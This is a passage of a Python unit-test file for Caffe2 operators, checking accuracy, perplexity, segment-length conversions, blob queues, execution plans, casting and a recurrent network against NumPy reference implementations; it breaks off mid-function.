def test_accuracy(self, prediction, labels, top_k, gc, dc):
if(top_k > 1):
gc = hu.cpu_do
op = core.CreateOperator(
"Accuracy",
["prediction", "labels"],
["accuracy"],
top_k=top_k,
device_option=gc
)
def op_ref(prediction, labels, top_k):
N = prediction.shape[0]
correct = 0
for i in range(0, len(prediction)):
pred_sorted = sorted(
([item, j] for j, item in enumerate(prediction[i])),
key=lambda x: x[0],
reverse=True
)
max_ids = [x[1] for x in pred_sorted[0:top_k]]
for m in max_ids:
if m == labels[i]:
correct += 1
accuracy = correct / N
return (accuracy,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels, top_k],
reference=op_ref)
@given(target_probabilities=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0.01,
max_value=1)),
**hu.gcs)
def test_perplexity(self, target_probabilities, gc, dc):
op = core.CreateOperator(
"Perplexity",
["target_probabilities"],
["perplexity"]
)
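        # The reference treats perplexity as the inverse geometric mean of
        # the target probabilities: prod_i p_i ** (-1 / N).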
def op_ref(target_probabilities):
N = target_probabilities.shape[0]
perplexities = np.power(target_probabilities, -1.0 / N)
perplexity = reduce(lambda x, y: x * y, perplexities)
return (perplexity,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[target_probabilities],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_segment_ids(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToSegmentIds",
["lengths"],
["segment_ids"])
def op_ref(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_range_fill(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsRangeFill",
["lengths"],
["increasing_seq"])
def op_ref(lengths):
sids = []
for _, l in enumerate(lengths):
sids.extend(list(range(l)))
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(**hu.gcs_cpu_only)
def test_segment_ids_to_ranges(self, gc, dc):
lengths = [4, 6, 3, 2, 0, 4]
op = core.CreateOperator(
"SegmentIdsToRanges",
["segment_ids"],
["ranges"])
def op_ref(segment_ids):
ranges = [np.array([0, 0], dtype=np.int32)]
prev = 0
for i, sid in enumerate(segment_ids):
while sid != prev:
prev += 1
ranges.append(np.array([i, 0], dtype=np.int32))
ranges[-1][1] += 1
return (np.array(ranges, dtype=np.int32), )
def lengths_to_segment_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=np.array(lengths_to_segment_ids(lengths), dtype=np.int32),
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_ranges(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToRanges",
["lengths"],
["ranges"])
def op_ref(x):
if not x.size:
return (x.reshape((0, 2)), )
return (np.column_stack((np.concatenate(([0], np.cumsum(x)[:-1])),
x)), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
**hu.gcs)
def test_multi_class_accuracy(self, prediction, labels, gc, dc):
op = core.CreateOperator(
"MultiClassAccuracy",
["prediction", "labels"],
["accuracies", "amounts"]
)
def op_ref(prediction, labels):
N = prediction.shape[0]
D = prediction.shape[1]
accuracies = np.empty(D, dtype=float)
accuracies.fill(0)
amounts = np.empty(D, dtype=int)
amounts.fill(0)
max_ids = np.argmax(prediction, axis=1)
for i in range(0, N):
max_id = max_ids[i]
label_id = labels[i]
if max_id == label_id:
accuracies[label_id] += 1
amounts[label_id] += 1
for i in range(0, D):
amount = amounts[i]
if amount:
accuracies[i] /= amount
return (accuracies, amounts,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_segment_ids_to_lengths(self, lengths, gc, dc):
op = core.CreateOperator(
"SegmentIdsToLengths",
["segment_ids"],
["lengths"])
def lengths_to_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return sids
segment_ids = lengths_to_ids(lengths)
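        # ids_to_lengths reverses the mapping above; when a segment id is
        # skipped it emits a zero length for each missing id, so the output
        # has max(id) + 1 entries for non-empty input.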
def ids_to_lengths(ids):
ids_length = len(ids)
if ids_length == 0:
return (np.array([], dtype=np.int32),)
lengths = []
# segment id starts with 0
prev_id = -1
tmp_length = 0
for idx in range(ids_length):
cur_id = ids[idx]
if cur_id != prev_id:
if idx != 0:
lengths.append(tmp_length)
while prev_id + 1 != cur_id:
lengths.append(0)
prev_id += 1
prev_id = cur_id
tmp_length = 0
tmp_length += 1
lengths.append(tmp_length)
return (np.array(lengths, dtype=np.int32),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(segment_ids, dtype=np.int32)],
reference=ids_to_lengths)
@given(lengths=st.lists(st.integers(min_value=1, max_value=10),
min_size=0,
max_size=10),
power=st.sampled_from([0.5, 1.0, 1.5, 2.0]),
**hu.gcs_cpu_only)
def test_lengths_to_weights(self, lengths, power, gc, dc):
op = core.CreateOperator(
"LengthsToWeights",
["lengths"],
["weights"],
power=power)
def lengths_to_weights(lengths):
weighted_length = []
for l in lengths:
weighted_length.extend(l * [1 / pow(l, power)])
return (np.array(weighted_length, dtype=float),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=lengths_to_weights)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_abs(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Abs",
["input"],
["output"]
)
def abs_ref(input_tensor):
return (np.abs(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=abs_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_cos(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Cos",
["input"],
["output"]
)
def cos_ref(input_tensor):
return (np.cos(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=cos_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_sin(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Sin",
["input"],
["output"]
)
def sin_ref(input_tensor):
return (np.sin(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=sin_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_exp(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Exp",
["input"],
["output"]
)
def exp_ref(input_tensor):
return (np.exp(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=exp_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=1,
max_value=10000)),
**hu.gcs_cpu_only)
def test_log(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Log",
["input"],
["output"]
)
def log_ref(input_tensor):
return (np.log(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=log_ref)
self.assertGradientChecks(gc, op, [input_tensor], 0, [0])
def test_blobs_dequeue_timeout(self):
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=5,
num_blobs=1)
self.ws.run(op)
t = time.time()
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
["out"],
timeout_secs=0.2)
self.assertRaises(RuntimeError, lambda: self.ws.run(op))
t = time.time() - t
self.assertGreater(t, 0.19)
@given(num_threads=st.integers(1, 10), # noqa
num_elements=st.integers(1, 100),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_blobs_queue_threading(self, num_threads, num_elements,
capacity, num_blobs, do):
"""
- Construct matrices of size N x D
- Start K threads
- Push all N rows into the queue of capacity C
- Pull all N rows out of the queue.
        - Verify that the output matrices are a permutation of the rows of
          the original matrices.
"""
import threading
try:
import queue
except ImportError:
            # Python 2 fallback
import Queue as queue
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=capacity,
num_blobs=num_blobs,
device_option=do)
self.ws.run(op)
xs = [np.random.randn(num_elements, 5).astype(np.float32)
for _ in range(num_blobs)]
q = queue.Queue()
for i in range(num_elements):
q.put([x[i] for x in xs])
def enqueue(t):
while True:
feed_blobs = ["x_{}_{}".format(i, t) for i in range(num_blobs)]
op = core.CreateOperator(
"EnqueueBlobs",
["queue"] + feed_blobs,
feed_blobs,
device_option=do)
try:
elems = q.get_nowait()
for elem, feed_blob in zip(elems, feed_blobs):
self.ws.create_blob(feed_blob).feed(
elem, device_option=do)
self.ws.run(op)
except queue.Empty:
return
# Create all blobs before racing on multiple threads
# (blob creation is not threadsafe)
for t in range(num_threads):
for i in range(num_blobs):
self.ws.create_blob("x_{}_{}".format(i, t))
threads = [threading.Thread(target=enqueue, args=(t,))
for t in range(num_threads)]
for thread in threads:
thread.start()
for n in range(num_elements):
dequeue_blobs = ["y_{}_{}".format(i, n) for i in range(num_blobs)]
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
dequeue_blobs,
device_option=do)
self.ws.run(op)
for thread in threads:
thread.join()
op = core.CreateOperator("CloseBlobsQueue", ["queue"], [])
self.ws.run(op)
ys = [np.vstack([self.ws.blobs["y_{}_{}".format(i, n)].fetch()
for n in range(num_elements)])
for i in range(num_blobs)]
for i in range(num_blobs):
self.assertEqual(ys[i].shape, xs[i].shape)
for j in range(num_elements):
# Verify that the rows of the returned blob are a
# permutation. The order may be different due to
# different threads racing.
self.assertTrue(
any(np.array_equal(xs[i][j], ys[i][k])
for k in range(num_elements)))
@given(num_producers=st.integers(1, 10),
num_consumers=st.integers(1, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_safe_blobs_queue(self, num_producers, num_consumers,
capacity, num_blobs, do):
init_net = core.Net('init_net')
queue = init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs)
producer_steps = []
truth = 0
for i in range(num_producers):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for times in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queue] + blobs, blobs + [status])
count = (i + 1) * 10
step = core.execution_step(name, net, num_iter=count)
truth += count
producer_steps.append(step)
producer_exit_net = core.Net('producer_exit_net')
producer_exit_net.CloseBlobsQueue([queue], 0)
producer_step = core.execution_step('producer', [
core.execution_step(
'producers', producer_steps, concurrent_substeps=True),
core.execution_step('producer_exit', producer_exit_net)]
)
consumer_steps = []
counters = []
const_1 = init_net.ConstantFill([], 1, value=1.0)
for i in range(num_consumers):
name = 'consumer_%d' % i
net1 = core.Net(name)
blobs = net1.SafeDequeueBlobs([queue], num_blobs + 1)
status = blobs[-1]
net2 = core.Net(name + '_counter')
counter = init_net.ConstantFill([], 1, value=0.0)
counters.append(counter)
net2.Add([counter, const_1], counter)
consumer_steps.append(core.execution_step(
name, [net1, net2], should_stop_blob=status))
consumer_step = core.execution_step(
'consumer', consumer_steps, concurrent_substeps=True)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [consumer_step, producer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
v = 0
for counter in counters:
v += self.ws.blobs[str(counter)].fetch().tolist()
self.assertEqual(v, truth)
@given(num_queues=st.integers(1, 5),
num_iter=st.integers(5, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3))
def test_weighted_sample_blobs_queue(
self, num_queues, num_iter, capacity, num_blobs
):
# Create BlobsQueue for each input queue
print("num_queues", num_queues)
init_net = core.Net('init_net')
queues = [
init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs
) for _ in range(num_queues)
]
        # Create multiple producer nets and one producer exit net
producer_steps = []
producer_exit_nets = []
for i in range(num_queues):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for _ in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queues[i]] + blobs, blobs + [status])
exit_net = core.Net('producer_exit_%d' % i)
exit_net.CloseBlobsQueue(queues[i], 0)
producer_exit_nets.append(exit_net)
step = core.execution_step(
name, [
core.execution_step(
'producer_%d' % i, [net], num_iter=num_iter
),
core.execution_step('producer_exit_%d' % i, [exit_net]),
]
)
producer_steps.append(step)
producer_step = core.execution_step(
'producer', [
core.execution_step(
'producers',
producer_steps,
concurrent_substeps=True,
),
]
)
status_lst = []
def append(ins, outs):
status_lst.append(ins)
        # Create one consumer dequeue net and one consumer exit net
consumer_net = core.Net('weight_sample_dequeue_net')
blobs = consumer_net.WeightedSampleDequeueBlobs(
queues,
num_blobs + 1,
weights=np.random.uniform(low=0.0, high=1.0, size=(num_queues,))
)
status = blobs[-1]
consumer_net.Python(append)(status)
consumer_step = core.execution_step(
'consumer',
[
core.execution_step(
'consumer', [consumer_net], should_stop_blob=status
),
core.execution_step('producer_exit', producer_exit_nets)
]
)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [producer_step, consumer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
assert len(status_lst) >= num_iter + 1
assert len(status_lst) <= num_iter * num_queues + 1
@given(
data=hu.tensor(),
**hu.gcs_cpu_only)
def test_squeeze_expand_dims(self, data, gc, dc):
dims = [0, 0]
if len(data.shape) > 2:
dims.append(2)
op = core.CreateOperator(
"ExpandDims",
["data"],
["expanded"],
dims=dims)
def expand_dims_ref(data, *args, **kw):
inc_dims = list(set(dims))
inc_dims.sort()
r = data
for dim in inc_dims:
r = np.expand_dims(r, axis=dim)
return (r, )
def squeeze_ref(data, *args, **kw):
dec_dims = list(set(dims))
dec_dims.sort(reverse=True)
r = data
for dim in dec_dims:
r = np.squeeze(r, axis=dim)
return (r, )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[data],
reference=expand_dims_ref,
output_to_grad='expanded',
grad_reference=squeeze_ref)
@given(**hu.gcs_cpu_only)
def test_tt_layer(self, gc, dc):
seed = 1234
np.random.seed(seed)
inp_sizes = [2, 2, 2, 2]
out_sizes = [2, 2, 2, 2]
tt_ranks = [1, 3, 3, 3, 1]
op = core.CreateOperator(
"TT",
["X", "b", "cores"],
["Y"],
inp_sizes=inp_sizes,
out_sizes=out_sizes,
tt_ranks=tt_ranks,
)
X = np.expand_dims(
np.random.rand(16).astype(np.float32), axis=0)
b = np.array([0] * 16).astype(np.float32)
cores = tt_core.init_tt_cores(inp_sizes, out_sizes, tt_ranks)
self.ws.create_blob("X").feed(X)
self.ws.create_blob("b").feed(b)
self.ws.create_blob("cores").feed(cores)
self.ws.run(op)
Y = self.ws.blobs[("Y")].fetch()
Y = Y.reshape([16])
golden = np.array([-9.51763490e-07, -1.28442286e-06,
-2.86281141e-07, 2.28865644e-07,
-1.96180017e-06, -1.78920531e-06,
9.31094666e-07, -2.04273989e-07,
1.70017107e-06, 1.64845711e-06,
-1.06099132e-06, -4.69111137e-07,
6.57552358e-08, -1.28942040e-08,
-2.29114004e-07, -1.04262714e-06])
# This golden array is dependent on the specified inp_sizes, out_sizes,
# tt_ranks, and seed. Changing these will cause the test to fail.
self.assertAlmostEqual(np.linalg.norm(golden - Y), 0, delta=1e-10)
@given(num_workers=st.integers(1, 10),
net_type=st.sampled_from(
["simple", "dag"] +
(["async_dag"] if workspace.has_gpu_support else [])),
do=st.sampled_from(hu.device_options))
def test_dag_net_forking(self, net_type, num_workers, do):
from caffe2.python.model_helper import ModelHelper
from caffe2.python import brew
m = ModelHelper(name="test_model")
n = 10
d = 2
depth = 2
iters = 5
np.random.seed(1701)
# Build a binary tree of FC layers, summing at each node.
for i in reversed(range(depth)):
for j in range(2 ** i):
bottom_1 = "{}_{}".format(i + 1, 2 * j)
bottom_2 = "{}_{}".format(i + 1, 2 * j + 1)
mid_1 = "{}_{}_m".format(i + 1, 2 * j)
mid_2 = "{}_{}_m".format(i + 1, 2 * j + 1)
top = "{}_{}".format(i, j)
brew.fc(
m,
bottom_1, mid_1,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
brew.fc(
m,
bottom_2, mid_2,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
m.net.Sum([mid_1, mid_2], top)
m.net.SquaredL2Distance(["0_0", "label"], "xent")
m.net.AveragedLoss("xent", "loss")
input_to_grad = m.AddGradientOperators(["loss"])
m.Proto().device_option.CopyFrom(do)
m.param_init_net.Proto().device_option.CopyFrom(do)
m.Proto().type = net_type
m.Proto().num_workers = num_workers
self.ws.run(m.param_init_net)
print(str(m.Proto()))
def run():
import numpy as np
np.random.seed(1701)
input_blobs = ["{}_{}".format(depth, j) for j in range(2 ** depth)]
for input_blob in input_blobs:
self.ws.create_blob(input_blob).feed(
np.random.randn(n, d).astype(np.float32),
device_option=do)
self.ws.create_blob("label").feed(
np.random.randn(n, d).astype(np.float32),
device_option=do)
self.ws.run(m.net)
gradients = [
self.ws.blobs[str(input_to_grad[input_blob])].fetch()
for input_blob in input_blobs]
return gradients
outputs = [run() for _ in range(iters)]
for output in outputs[1:]:
np.testing.assert_array_equal(outputs[0], output)
self.assertAlmostEqual(np.sum(np.square(output)), 91.81752,
delta=1e-2)
@given(input=hu.tensor(min_dim=2, max_dim=6, dtype=np.int32,
elements=st.integers(min_value=0,
max_value=2**32 - 1)),
slice_dim=st.integers(),
a=st.integers(),
b=st.integers(),
is_empty=st.booleans(),
**hu.gcs_cpu_only)
def test_slice(self, input, slice_dim, a, b, is_empty, gc, dc):
slice_dim = slice_dim % len(input.shape)
if (is_empty):
input = np.random.rand(*([0] + list(input.shape))).astype(np.int32)
slice_dim += 1
a = a % input.shape[slice_dim]
b = b % input.shape[slice_dim] + 1
start_vec = np.zeros(len(input.shape), dtype=np.int32)
end_vec = np.ones(len(input.shape), dtype=np.int32) * -1
start_vec[slice_dim] = min(a, b)
end_vec[slice_dim] = max(a, b)
op = core.CreateOperator(
"Slice",
["input", "start", "end"],
["output"])
def slice_ref(x, s, e):
if len(s.shape) == 0:
return x
slc = [slice(si, None if ei == -1 else ei) for si, ei in zip(s, e)]
return (x[slc], )
self.assertReferenceChecks(gc, op, [input, start_vec, end_vec],
slice_ref)
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_shape(self, data, gc, dc):
op = core.CreateOperator("Shape", ["data"], ["shape"])
self.assertReferenceChecks(gc, op, [data], lambda x: (x.shape, ))
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_has_elements(self, data, gc, dc):
op = core.CreateOperator("HasElements", ["data"], ["has_elements"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) > 0, ))
op = core.CreateOperator("IsEmpty", ["data"], ["is_empty"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) == 0, ))
@given(initial_iters=st.integers(0, 100),
max_iters=st.integers(0, 100))
def test_should_stop_as_criteria_net_execution_step(
self, initial_iters, max_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
self.ws.create_blob("num_iters").feed(
np.asarray([max_iters]).astype(np.int64))
criteria_net = core.Net("criteria")
criteria_net.GE(["iter", "num_iters"], ["stop"])
criteria_net.Proto().external_output.extend(["stop"])
plan = core.Plan('plan')
plan.AddStep(core.execution_step(
'step', [criteria_net, net],
should_stop_blob=core.BlobReference("stop")))
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], max(initial_iters, max_iters))
def test_disabled_execution_step(self):
def createNets(i, disabled):
should_stop = 'should_stop_{}'.format(i)
output = 'output_{}'.format(i)
# init content and stop signal
init = core.Net("init_{}".format(i))
init.ConstantFill(
[],
[output],
shape=[1],
value=0.0
)
init.Cast([output], [should_stop], to='bool')
# decide if disabled or not
criterion = core.Net("criterion_{}".format(i))
tmp = criterion.ConstantFill(
[],
shape=[1],
value=1.0 if disabled else 0.0
)
criterion.Cast([tmp], [should_stop], to='bool')
criterion.Proto().external_output.extend([should_stop])
# the body net is just to turn a 0 blob to 1
net = core.Net("net_{}".format(i))
net.ConstantFill(
[],
[output],
shape=[1],
value=1.0
)
# always end the loop
ender = core.Net("ender_{}".format(i))
tmp = ender.ConstantFill(
[],
shape=[1],
value=1.0
)
ender.Cast([tmp], [should_stop], to='bool')
ender.Proto().external_output.extend([should_stop])
return [init, criterion, net, ender]
nets = [createNets(1, False),
createNets(2, True),
createNets(3, False)]
steps = [
core.execution_step(
'step_1', nets[0],
should_stop_blob=core.BlobReference('should_stop_1')),
core.execution_step(
'step_2', nets[1],
should_stop_blob=core.BlobReference('should_stop_2')),
core.execution_step('step_3', nets[2])
]
expected = [1.0, 0.0, 1.0]
plan = core.Plan('plan')
plan.AddStep(core.execution_step('all_steps', steps, num_iter=3))
self.ws.run(plan)
for i, _ in enumerate(nets):
self.assertEqual(
self.ws.blobs['output_{}'.format(i + 1)].fetch()[0],
expected[i])
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100))
def test_iter_count_with_execution_step(self, initial_iters, num_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
step = core.ExecutionStep("step", [net])
step.SetIter(num_iters)
plan = core.Plan("plan")
plan.AddStep(step)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters)
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100),
num_nets=st.integers(0, 5))
def test_atomic_iter_with_concurrent_steps(self, initial_iters, num_iters,
num_nets):
init_net = core.Net("init_net")
iter_mutex = init_net.CreateMutex([], ["iter_mutex"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
concurrent_steps = core.ExecutionStep("concurrent_steps",
num_iter=num_iters)
for i in range(num_nets):
net = core.Net("net_{}".format(i))
net.AtomicIter([iter_mutex, "iter"], ["iter"])
step = core.ExecutionStep("step", [net])
concurrent_steps.AddSubstep(step)
concurrent_steps.SetConcurrentSubsteps(True)
plan = core.Plan("plan")
plan.AddStep(concurrent_steps)
self.ws.run(init_net)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters * num_nets)
@given(a=hu.tensor(),
src=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
dst=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
use_name=st.booleans(),
**hu.gcs)
def test_cast(self, a, src, dst, use_name, gc, dc):
a = a.astype(src)
# Casting from a float type outside the range of the integral
# type is UB.
ftypes = [np.float32, np.float64]
if src in ftypes and dst not in ftypes and dst is not np.bool:
info = np.iinfo(dst)
a = np.clip(a, info.min, info.max)
def ref(data):
return [data.astype(dst)]
to = _NUMPY_TYPE_TO_ENUM[dst]
if use_name:
to = TensorProto.DataType.Name(to).lower()
op = core.CreateOperator('Cast', ["X"], ["Y"], to=to)
self.assertDeviceChecks(dc, op, [a], [0])
out, = self.assertReferenceChecks(gc, op, [a], ref)
self.assertEqual(dst, out.dtype)
@given(a=hu.tensor(),
eps=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_logit(self, a, eps, gc, dc):
def ref(data):
data = np.clip(data, eps, 1.0 - eps)
return (np.log(data / (1 - data)), )
op = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(a=hu.tensor(elements=st.floats(allow_nan=True)),
value=st.floats(min_value=-10, max_value=10),
**hu.gcs_cpu_only)
def test_replace_nan(self, a, value, gc, dc):
def ref(data):
out = np.copy(data)
out[np.isnan(data)] = value
return (out, )
op = core.CreateOperator('ReplaceNaN', ["X"], ["Y"], value=value)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(data=_dtypes(dtypes=[np.int32, np.int64, np.float32, np.bool]).
flatmap(lambda dtype: hu.tensor(
min_dim=1, dtype=dtype, elements=hu.elements_of_type(dtype))),
has_input=st.booleans(),
has_extra_shape=st.booleans(),
extra_shape=st.lists(
min_size=1, max_size=5, elements=st.integers(1, 5)),
**hu.gcs)
def test_constant_fill(self, data, has_input, has_extra_shape, extra_shape,
gc, dc):
dtype = data.dtype.type
# in opt mode, np.bool is converted into np.bool_
if data.dtype == np.dtype(np.bool):
dtype = np.bool
value = data.item(0)
gt_shape = data.shape
inputs = [data]
enum_type = _NUMPY_TYPE_TO_ENUM[dtype]
if has_input:
if has_extra_shape:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
extra_shape=extra_shape,
value=value)
gt_shape += tuple(extra_shape)
else:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
value=value)
else:
op = core.CreateOperator('ConstantFill', [], ["Y"],
dtype=enum_type,
value=value,
shape=list(gt_shape))
inputs = []
def ref(inputs=None):
outputs = np.full(shape=gt_shape, fill_value=value, dtype=dtype)
return [outputs]
self.assertDeviceChecks(dc, op, inputs, [0])
out, = self.assertReferenceChecks(gc, op, inputs, ref)
self.assertEqual(dtype, out.dtype)
@given(t=st.integers(1, 5),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_elman_recurrent_network(self, t, n, d):
from caffe2.python import model_helper, brew
np.random.seed(1701)
step_net = model_helper.ModelHelper(name="Elman")
# TODO: name scope external inputs and outputs
step_net.Proto().external_input.extend(
["input_t", "seq_lengths", "timestep",
"hidden_t_prev", "gates_t_w", "gates_t_b"])
step_net.Proto().type = "simple"
step_net.Proto().external_output.extend(["hidden_t", "gates_t"])
brew.fc(step_net,
"hidden_t_prev", "gates_t", dim_in=d, dim_out=d, axis=2)
step_net.net.Sum(["gates_t", "input_t"], ["gates_t"])
step_net.net.Sigmoid(["gates_t"], ["hidden_t"])
# Initialize params for step net in the parent net
for op in step_net.param_init_net.Proto().op:
workspace.RunOperatorOnce(op)
backward_ops, backward_mapping = core.GradientRegistry.GetBackwardPass(
step_net.Proto().op, {"hidden_t": "hidden_t_grad"})
backward_mapping = {
str(k): str(v) for k, v in viewitems(backward_mapping)
}
backward_step_net = core.Net("ElmanBackward")
del backward_step_net.Proto().op[:]
backward_step_net.Proto().op.extend(backward_ops)
assert backward_mapping["input_t"] == "gates_t_grad"
links = [
("hidden_t_prev", "hidden", 0),
("hidden_t", "hidden", 1),
("input_t", "input", 0),
]
link_internal, link_external, link_offset = zip(*links)
backward_links = [
("hidden_t_prev_grad", "hidden_grad", 0),
("hidden_t_grad", "hidden_grad", 1),
("gates_t_grad", "input_grad", 0),
]
backward_link_internal, backward_link_external, backward_link_offset = \
zip(*backward_links)
backward_step_net.Proto().external_input.extend(["hidden_t_grad"])
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_input)
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_output)
inputs = ["input", "seq_lengths", "gates_t_w", "gates_t_b", "hidden_input"]
recurrent_inputs = ["hidden_input"]
op = core.CreateOperator(
"RecurrentNetwork",
inputs,
["output", "hidden", "hidden_output", "step_workspaces"],
alias_src=["hidden", "hidden"],
alias_dst=["output", "hidden_output"],
alias_offset=[1, -1],
recurrent_states=["hidden"],
initial_recurrent_state_ids=[
inputs.index(i) for i in recurrent_inputs
],
link_internal=link_internal,
link_external=link_external,
link_offset=link_offset,
backward_link_internal=backward_link_internal,
backward_link_external=backward_link_external,
backward_link_offset=backward_link_offset,
param=[inputs.index(p) for p in step_net.params],
step_net=str(step_net.Proto()),
backward_step_net=str(backward_step_net.Proto()),
outputs_with_grads=[0],
)
workspace.FeedBlob(
"input", np.random.randn(t, n, d).astype(np.float32))
workspace.FeedBlob(
"hidden_input", np.random.randn(1, n, d).astype(np.float32))
workspace.FeedBlob(
"seq_lengths", np.random.randint(0, t, size=(n,)).astype(np.int32))
def reference(input, seq_lengths, gates_w, gates_b, hidden_input):
T = input.shape[0]
N = input.shape[1]
D = input.shape[2]
hidden = np.zeros(shape=(T + 1, N, D))
assert hidden.shape[0] == T + 1
assert hidden.shape[1] == N
assert hidden.shape[2] == D
hidden[0, :, :] = hidden_input
